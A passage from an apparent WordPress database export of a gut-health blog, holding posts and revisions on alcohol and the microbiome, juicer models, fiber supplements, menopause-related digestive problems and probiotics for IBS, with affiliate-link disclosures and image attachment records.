Enzymedica with probiotics

\n\n\n\n

Bio-Kult

\n\n\n\n

\n\n\n\n

Optibac Everyday

\n\n\n\n

\n\n\n\n


Conclusion

\n\n\n\n

Living with IBS doesn\'t have to mean enduring constant discomfort. Incorporating the right probiotics into your daily routine could provide the relief you seek by fostering a healthier gut environment. However, it\'s important to note that individual responses to probiotics may vary. Consulting with a healthcare professional before starting any new supplement regimen is recommended, especially if you have underlying health conditions or are taking medications. With the guidance of a healthcare provider, you can select the probiotic strains that align with your needs and take a step toward managing your IBS symptoms effectively.

\n','What type of probiotics works best for IBS ','','inherit','closed','closed','','5526-revision-v1','','','2023-09-13 13:50:31','2023-09-13 13:50:31','',5526,'https://tummyrevolution.com/?p=5533',0,'revision','',0),(5534,1,'2023-09-13 15:34:15','0000-00-00 00:00:00','\n

Raise a toast to good health, but beware the potential consequences of overindulging in alcohol. While a glass of wine or a cocktail can be enjoyed in moderation, excessive alcohol consumption can wreak havoc on your gut health and disrupt the delicate balance of your microbiome. In this article, we\'ll explore the detrimental effects of alcohol on your gut and microbiome, shedding light on why it\'s crucial to be mindful of your alcohol intake.

\n\n\n\n

1. Imbalance in Gut Microbiome

\n\n\n\n

Your gut is home to trillions of microorganisms that collectively form your gut microbiome. This community of bacteria, viruses, and fungi plays a vital role in digestion, immune function, and overall well-being. Alcohol, particularly when consumed in excess, can disturb this delicate ecosystem, leading to an imbalance between beneficial and harmful bacteria. This imbalance can have a ripple effect on your digestion, immunity, and even mental health.

\n\n\n\n

2. Gut Barrier Dysfunction

\n\n\n\n

The gut lining acts as a barrier, preventing harmful substances from entering the bloodstream. Excessive alcohol consumption can compromise this barrier, a phenomenon known as \"leaky gut.\" A leaky gut allows toxins, undigested food particles, and harmful bacteria to pass through the intestinal lining and enter the bloodstream. This can trigger inflammation, immune responses, and contribute to various health issues, including autoimmune conditions.

\n\n\n\n

3. Inflammation and Immune Response

\n\n\n\n

Alcohol is known to trigger inflammation in the body, and the gut is not exempt from its effects. Chronic inflammation in the gut can lead to a host of problems, including irritable bowel syndrome (IBS), inflammatory bowel disease (IBD), and even an increased risk of certain cancers. Moreover, excessive alcohol intake can suppress the immune system, making you more susceptible to infections and delaying the healing process.

\n\n\n\n

4. Altered Nutrient Absorption

\n\n\n\n

Alcohol interferes with the absorption of essential nutrients like vitamins and minerals. This can lead to deficiencies that impact your overall health, energy levels, and even your skin. For example, alcohol consumption can impair the absorption of B vitamins, which play a vital role in metabolism and overall well-being.

\n\n\n\n

5. Disrupted Digestive Function

\n\n\n\n

Alcohol can disrupt the natural rhythm of your digestive system, leading to issues such as acid reflux, bloating, and indigestion. It can also slow down the movement of food through the intestines, causing constipation. These digestive disturbances can impact your comfort, quality of life, and even nutrient absorption.

\n\n\n\n

Conclusion

\n\n\n\n

While the allure of alcohol is undeniable, it\'s important to be mindful of its potential impact on your gut health and microbiome. Excessive alcohol consumption can disrupt the intricate balance of your gut microbiome, compromise the gut barrier, trigger inflammation, and interfere with nutrient absorption. If you choose to enjoy alcohol, moderation is key. Balancing your alcohol intake with a diet rich in fiber, whole foods, and fermented delicacies can help support your gut health and maintain the harmony of your microbiome. Remember, a healthy gut leads to a healthier you, so raise your awareness along with that glass and make choices that contribute to your well-being.

\n','Title: Gut Health Under the Influence: The Detrimental Effects of Alcohol on Your Microbiome','','draft','open','open','','','','','2023-09-13 15:34:15','2023-09-13 15:34:15','',0,'https://tummyrevolution.com/?p=5534',0,'post','',0),(5535,1,'2023-09-13 15:23:54','2023-09-13 15:23:54','','pexels-pixabay-209620','','inherit','open','closed','','pexels-pixabay-209620','','','2023-09-13 15:23:54','2023-09-13 15:23:54','',5534,'http://tummyrevolution.com/wp-content/uploads/2023/09/pexels-pixabay-209620.jpg',0,'attachment','image/jpeg',0),(5536,1,'2023-09-13 15:33:53','2023-09-13 15:33:53','\n

Raise a toast to good health, but beware the potential consequences of overindulging in alcohol. While a glass of wine or a cocktail can be enjoyed in moderation, excessive alcohol consumption can wreak havoc on your gut health and disrupt the delicate balance of your microbiome. In this article, we\'ll explore the detrimental effects of alcohol on your gut and microbiome, shedding light on why it\'s crucial to be mindful of your alcohol intake.

\n\n\n\n

1. Imbalance in Gut Microbiome

\n\n\n\n

Your gut is home to trillions of microorganisms that collectively form your gut microbiome. This community of bacteria, viruses, and fungi plays a vital role in digestion, immune function, and overall well-being. Alcohol, particularly when consumed in excess, can disturb this delicate ecosystem, leading to an imbalance between beneficial and harmful bacteria. This imbalance can have a ripple effect on your digestion, immunity, and even mental health.

\n\n\n\n

2. Gut Barrier Dysfunction

\n\n\n\n

The gut lining acts as a barrier, preventing harmful substances from entering the bloodstream. Excessive alcohol consumption can compromise this barrier, a phenomenon known as \"leaky gut.\" A leaky gut allows toxins, undigested food particles, and harmful bacteria to pass through the intestinal lining and enter the bloodstream. This can trigger inflammation, immune responses, and contribute to various health issues, including autoimmune conditions.

\n\n\n\n

3. Inflammation and Immune Response

\n\n\n\n

Alcohol is known to trigger inflammation in the body, and the gut is not exempt from its effects. Chronic inflammation in the gut can lead to a host of problems, including irritable bowel syndrome (IBS), inflammatory bowel disease (IBD), and even an increased risk of certain cancers. Moreover, excessive alcohol intake can suppress the immune system, making you more susceptible to infections and delaying the healing process.

\n\n\n\n

4. Altered Nutrient Absorption

\n\n\n\n

Alcohol interferes with the absorption of essential nutrients like vitamins and minerals. This can lead to deficiencies that impact your overall health, energy levels, and even your skin. For example, alcohol consumption can impair the absorption of B vitamins, which play a vital role in metabolism and overall well-being.

\n\n\n\n

5. Disrupted Digestive Function

\n\n\n\n

Alcohol can disrupt the natural rhythm of your digestive system, leading to issues such as acid reflux, bloating, and indigestion. It can also slow down the movement of food through the intestines, causing constipation. These digestive disturbances can impact your comfort, quality of life, and even nutrient absorption.

\n\n\n\n

Conclusion

\n\n\n\n

While the allure of alcohol is undeniable, it\'s important to be mindful of its potential impact on your gut health and microbiome. Excessive alcohol consumption can disrupt the intricate balance of your gut microbiome, compromise the gut barrier, trigger inflammation, and interfere with nutrient absorption. If you choose to enjoy alcohol, moderation is key. Balancing your alcohol intake with a diet rich in fiber, whole foods, and fermented delicacies can help support your gut health and maintain the harmony of your microbiome. Remember, a healthy gut leads to a healthier you, so raise your awareness along with that glass and make choices that contribute to your well-being.

\n','Title: Gut Health Under the Influence: The Detrimental Effects of Alcohol on Your Microbiome','','inherit','closed','closed','','5534-revision-v1','','','2023-09-13 15:33:53','2023-09-13 15:33:53','',5534,'https://tummyrevolution.com/?p=5536',0,'revision','',0),(5537,1,'2023-10-07 06:10:01','2023-10-07 06:10:01','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n\"\"\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n\"\"\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n\"\"\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Choosing the Best Juicer 2023: A Comparison of Top Models','','publish','open','open','','title-choosing-the-best-juicer-2023-a-comparison-of-top-models','','','2023-10-10 12:59:06','2023-10-10 12:59:06','',0,'https://tummyrevolution.com/?p=5537',0,'post','',0),(5538,1,'2023-09-13 16:03:16','2023-09-13 16:03:16','','sergey-kotenev-jouxBCj9RNo-unsplash','','inherit','open','closed','','sergey-kotenev-jouxbcj9rno-unsplash','','','2023-09-13 16:03:16','2023-09-13 16:03:16','',5537,'http://tummyrevolution.com/wp-content/uploads/2023/09/sergey-kotenev-jouxBCj9RNo-unsplash.jpg',0,'attachment','image/jpeg',0),(5539,1,'2023-09-13 16:03:32','2023-09-13 16:03:32','','tangerine-newt-hINQgaTqg7Q-unsplash','','inherit','open','closed','','tangerine-newt-hinqgatqg7q-unsplash','','','2023-09-13 16:03:32','2023-09-13 16:03:32','',5537,'http://tummyrevolution.com/wp-content/uploads/2023/09/tangerine-newt-hINQgaTqg7Q-unsplash.jpg',0,'attachment','image/jpeg',0),(5540,1,'2023-09-13 16:03:46','2023-09-13 16:03:46','','pexels-polina-tankilevitch-4110334','','inherit','open','closed','','pexels-polina-tankilevitch-4110334-2','','','2023-09-13 16:03:46','2023-09-13 16:03:46','',5537,'http://tummyrevolution.com/wp-content/uploads/2023/09/pexels-polina-tankilevitch-4110334-1.jpg',0,'attachment','image/jpeg',0),(5541,1,'2023-09-13 16:03:53','2023-09-13 16:03:53','Best Juicers','pexels-pixabay-161440','','inherit','open','closed','','pexels-pixabay-161440','','','2023-09-13 16:04:56','2023-09-13 16:04:56','',5537,'http://tummyrevolution.com/wp-content/uploads/2023/09/pexels-pixabay-161440.jpg',0,'attachment','image/jpeg',0),(5542,1,'2023-09-13 16:07:02','2023-09-13 16:07:02','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Title: Choosing the Best Juicer: A Comparison of Top Models','','inherit','closed','closed','','5537-revision-v1','','','2023-09-13 16:07:02','2023-09-13 16:07:02','',5537,'https://tummyrevolution.com/?p=5542',0,'revision','',0),(5543,1,'2023-10-12 17:19:53','2023-10-12 17:19:53','\n

When it comes to achieving optimal health, we often hear about the importance of a balanced diet and regular exercise. However, there\'s a silent hero working behind the scenes in your body, playing a vital role in your well-being: dietary fiber. Yes, that\'s right – fiber is the unsung champion of gut health! (Skip to top 5 Fibre Supplements HERE)

\n\n\n\n

The Gut\'s Best Friend

\n\n\n\n

Fiber is like the loyal friend your gut can always count on. It\'s a type of carbohydrate found in plant-based foods, such as fruits, vegetables, whole grains, legumes, and nuts. What makes fiber truly remarkable is its ability to transform your gut health for the better.

\n\n\n\n

A Digestive Dynamo

\n\n\n\n

Your digestive system is like a finely tuned engine, and fiber is the premium fuel that keeps it running smoothly. Here\'s how:

\n\n\n\n

1. Improved Digestion

\n\n\n\n

Fiber adds bulk to your stool, making it easier to pass through your intestines. This helps prevent constipation and promotes regular bowel movements, which are essential for a healthy gut.

\n\n\n\n

2. Nourishing Good Bacteria

\n\n\n\n

Fiber is the preferred food source for the beneficial bacteria living in your gut, known as probiotics. These good bacteria play a crucial role in maintaining a balanced gut microbiome, which is linked to better digestion and a stronger immune system.

\n\n\n\n

3. Reduced Inflammation

\n\n\n\n

A high-fiber diet can help reduce inflammation in your gut. Chronic inflammation can lead to various health issues, including digestive disorders like irritable bowel syndrome (IBS) and even serious conditions like inflammatory bowel disease (IBD).

\n\n\n\n

Fiber-Rich Foods to the Rescue

\n\n\n\n

To reap the benefits of fiber, include more of these fiber-rich foods in your diet:

\n\n\n\n
    \n
  • Whole Grains: Opt for whole wheat bread, brown rice, quinoa, and oats.
  • \n\n\n\n
  • Fruits: Enjoy apples, berries, pears, and oranges with their skins on.
  • \n\n\n\n
  • Vegetables: Load up on broccoli, kale, spinach, carrots, and sweet potatoes.
  • \n\n\n\n
  • Legumes: Incorporate beans, lentils, and chickpeas into your meals.
  • \n\n\n\n
  • Nuts and Seeds: Snack on almonds, chia seeds, and flaxseeds.
  • \n
\n\n\n\n

A Happy Gut, A Happy You

\n\n\n\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 Fibre Supplements to Promote Good Gut Health

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n\n\n\n

Viva Naturals Organic Psyllium Husk Powder (1.5 lbs) - Easy Mixing Fiber Supplement, Finely Ground & Non-GMO Powder for Promoting Regularity

\n\n\n\n\"\"\n\n\n\n

Natural Factors, Organic Low FODMAP Reliefiber, Digestive Fiber Powder

\n\n\n\n\"\"\n','Title: \"Fiber: Your Gut\'s Superhero for a Healthy You!\"','','publish','open','open','','title-fiber-your-guts-superhero-for-a-healthy-you','','','2023-10-12 17:45:01','2023-10-12 17:45:01','',0,'https://tummyrevolution.com/?p=5543',0,'post','',0),(5544,1,'2023-09-13 16:17:59','2023-09-13 16:17:59','','Auguste Renoir: La Grenouillère.\nNM 2425','Auguste Renoir: La Grenouillère.\nNM 2425','inherit','open','closed','','auguste-renoir-la-grenouillere-nm-2425','','','2023-09-13 16:17:59','2023-09-13 16:17:59','',5543,'http://tummyrevolution.com/wp-content/uploads/2023/09/La_Grenouillere_Auguste_Renoir_-_Nationalmuseum_-_19486.tif',0,'attachment','image/tiff',0),(5545,1,'2023-09-13 16:18:04','2023-09-13 16:18:04','What exercises to do for IBS and gut health ','kaylee-garrett-GaprWyIw66o-unsplash','','inherit','open','closed','','kaylee-garrett-gaprwyiw66o-unsplash','','','2023-09-14 07:02:47','2023-09-14 07:02:47','',5543,'http://tummyrevolution.com/wp-content/uploads/2023/09/kaylee-garrett-GaprWyIw66o-unsplash.jpg',0,'attachment','image/jpeg',0),(5546,1,'2023-09-13 16:18:18','2023-09-13 16:18:18','','linnette-elizabeth-CWoUrw5Lwx8-unsplash','','inherit','open','closed','','linnette-elizabeth-cwourw5lwx8-unsplash-2','','','2023-09-13 16:18:18','2023-09-13 16:18:18','',5543,'http://tummyrevolution.com/wp-content/uploads/2023/09/linnette-elizabeth-CWoUrw5Lwx8-unsplash-1.jpg',0,'attachment','image/jpeg',0),(5547,1,'2023-09-13 16:18:28','2023-09-13 16:18:28','','pexels-inga-seliverstova-3394310','','inherit','open','closed','','pexels-inga-seliverstova-3394310','','','2023-09-13 16:18:28','2023-09-13 16:18:28','',5543,'http://tummyrevolution.com/wp-content/uploads/2023/09/pexels-inga-seliverstova-3394310.jpg',0,'attachment','image/jpeg',0),(5548,1,'2023-09-13 16:18:42','2023-09-13 16:18:42','The benefits of Fibre Supplements and top 5 fibre Supplenets','Fibre Supplements','Top 5 Fibre Supplements\n','inherit','open','closed','','rachael-gorjestani-p18zfezfmlq-unsplash','','','2023-10-12 17:18:37','2023-10-12 17:18:37','',5543,'http://tummyrevolution.com/wp-content/uploads/2023/09/rachael-gorjestani-P18ZFezFmLQ-unsplash.jpg',0,'attachment','image/jpeg',0),(5549,1,'2023-09-14 06:06:24','2023-09-14 06:06:24','\n

When it comes to achieving optimal health, we often hear about the importance of a balanced diet and regular exercise. However, there\'s a silent hero working behind the scenes in your body, playing a vital role in your well-being: dietary fiber. Yes, that\'s right – fiber is the unsung champion of gut health!

\n\n\n\n

The Gut\'s Best Friend

\n\n\n\n

Fiber is like the loyal friend your gut can always count on. It\'s a type of carbohydrate found in plant-based foods, such as fruits, vegetables, whole grains, legumes, and nuts. What makes fiber truly remarkable is its ability to transform your gut health for the better.

\n\n\n\n

A Digestive Dynamo

\n\n\n\n

Your digestive system is like a finely tuned engine, and fiber is the premium fuel that keeps it running smoothly. Here\'s how:

\n\n\n\n

1. Improved Digestion

\n\n\n\n

Fiber adds bulk to your stool, making it easier to pass through your intestines. This helps prevent constipation and promotes regular bowel movements, which are essential for a healthy gut.

\n\n\n\n

2. Nourishing Good Bacteria

\n\n\n\n

Fiber is the preferred food source for the beneficial bacteria living in your gut, known as probiotics. These good bacteria play a crucial role in maintaining a balanced gut microbiome, which is linked to better digestion and a stronger immune system.

\n\n\n\n

3. Reduced Inflammation

\n\n\n\n

A high-fiber diet can help reduce inflammation in your gut. Chronic inflammation can lead to various health issues, including digestive disorders like irritable bowel syndrome (IBS) and even serious conditions like inflammatory bowel disease (IBD).

\n\n\n\n

Fiber-Rich Foods to the Rescue

\n\n\n\n

To reap the benefits of fiber, include more of these fiber-rich foods in your diet:

\n\n\n\n
    \n
  • Whole Grains: Opt for whole wheat bread, brown rice, quinoa, and oats.
  • \n\n\n\n
  • Fruits: Enjoy apples, berries, pears, and oranges with their skins on.
  • \n\n\n\n
  • Vegetables: Load up on broccoli, kale, spinach, carrots, and sweet potatoes.
  • \n\n\n\n
  • Legumes: Incorporate beans, lentils, and chickpeas into your meals.
  • \n\n\n\n
  • Nuts and Seeds: Snack on almonds, chia seeds, and flaxseeds.
  • \n
\n\n\n\n

A Happy Gut, A Happy You

\n\n\n\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being.

\n','Title: \"Fiber: Your Gut\'s Superhero for a Healthy You!\"','','inherit','closed','closed','','5543-revision-v1','','','2023-09-14 06:06:24','2023-09-14 06:06:24','',5543,'https://tummyrevolution.com/?p=5549',0,'revision','',0),(5550,1,'2023-09-14 06:12:10','2023-09-14 06:12:10','\n

Menopause is a natural phase in a woman\'s life, marking the end of her reproductive years. While it brings about a multitude of physical and hormonal changes, many women may not be aware that these changes can also impact their digestive system. Digestive problems during menopause are not uncommon, but understanding the causes and seeking appropriate treatment can help alleviate discomfort and improve overall well-being.

\n\n\n\n

The Menopausal Digestive Connection

\n\n\n\n

As women approach menopause, hormonal fluctuations, particularly a decline in estrogen and progesterone levels, can influence various bodily functions, including digestion. These hormonal changes can affect the functioning of the gastrointestinal tract, leading to a range of digestive issues. Common digestive problems during menopause include:

\n\n\n\n
    \n
  1. Gastroesophageal Reflux Disease (GERD): The decrease in estrogen levels can lead to a weakening of the muscles that control the opening between the esophagus and stomach, resulting in acid reflux and heartburn.
  2. \n\n\n\n
  3. Bloating and Gas: Hormonal changes can slow down digestion, causing food to linger in the digestive tract longer than usual. This can lead to increased gas production and bloating.
  4. \n\n\n\n
  5. Constipation: Reduced estrogen levels can impact bowel movements by affecting muscle contractions in the intestines. This can result in constipation and discomfort.
  6. \n\n\n\n
  7. Irritable Bowel Syndrome (IBS): Menopause can exacerbate symptoms of IBS, including abdominal pain, diarrhea, and constipation, due to the hormonal changes\' impact on gut sensitivity.
  8. \n\n\n\n
  9. Changes in Appetite: Fluctuating hormones can lead to changes in appetite, potentially causing overeating or loss of interest in food.
  10. \n
\n\n\n\n

Managing Digestive Problems

\n\n\n\n

The good news is that there are several effective strategies for managing digestive problems during menopause. It\'s important to consult a healthcare professional before making any significant changes, as individual needs may vary. Here are some approaches to consider:

\n\n\n\n

Dietary Modifications:

\n\n\n\n
    \n
  1. Increase fiber intake: A high-fiber diet can help alleviate constipation and promote regular bowel movements.
  2. \n\n\n\n
  3. Avoid trigger foods: Spicy, acidic, and fatty foods can worsen acid reflux and heartburn. Limiting these foods can provide relief.
  4. \n\n\n\n
  5. Stay hydrated: Drinking plenty of water supports healthy digestion and prevents constipation.
  6. \n\n\n\n
  7. Probiotics: Incorporating probiotic-rich foods or supplements can help maintain gut health and ease symptoms of bloating and gas.
  8. \n\n\n\n
  9. Lifestyle Changes:
  10. \n\n\n\n
  11. Maintain a healthy weight: Excess weight can contribute to digestive issues. Regular exercise and a balanced diet can aid in weight management.
  12. \n\n\n\n
  13. Eat smaller, frequent meals: Opting for smaller meals throughout the day can help prevent overloading the digestive system.
  14. \n\n\n\n
  15. Stress management: Practicing relaxation techniques such as yoga, meditation, or deep breathing can alleviate stress-related digestive problems.
  16. \n
\n\n\n\n

Medications and Supplements:

\n\n\n\n
    \n
  • Antacids: Over-the-counter antacids can provide temporary relief from heartburn and acid reflux symptoms.
  • \n\n\n\n
  • Laxatives: For occasional constipation, gentle laxatives may be recommended, but they should be used under medical supervision.
  • \n\n\n\n
  • Hormone therapy: In some cases, hormone replacement therapy (HRT) may be prescribed to manage menopausal symptoms, which could indirectly improve digestive issues.
  • \n\n\n\n
  • Regular Medical Check-ups:
  • \n\n\n\n
  •  Regular visits to a healthcare provider are essential to monitor and manage any emerging health concerns.
  • \n
\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

While digestive problems during menopause can be challenging, they are manageable with the right approach. By making dietary adjustments, adopting a healthy lifestyle, considering medications if necessary, and seeking guidance from healthcare professionals, women can navigate this transitional phase with greater comfort and improved digestive well-being. Remember, each woman\'s experience is unique, so it\'s important to tailor strategies to individual needs and preferences for the best results.

\n','A Comprehensive Guide to Digestive Problems During Menopause','','inherit','closed','closed','','5489-revision-v1','','','2023-09-14 06:12:10','2023-09-14 06:12:10','',5489,'https://tummyrevolution.com/?p=5550',0,'revision','',0),(5551,1,'2023-10-12 07:30:24','2023-10-12 07:30:24','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

1. Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

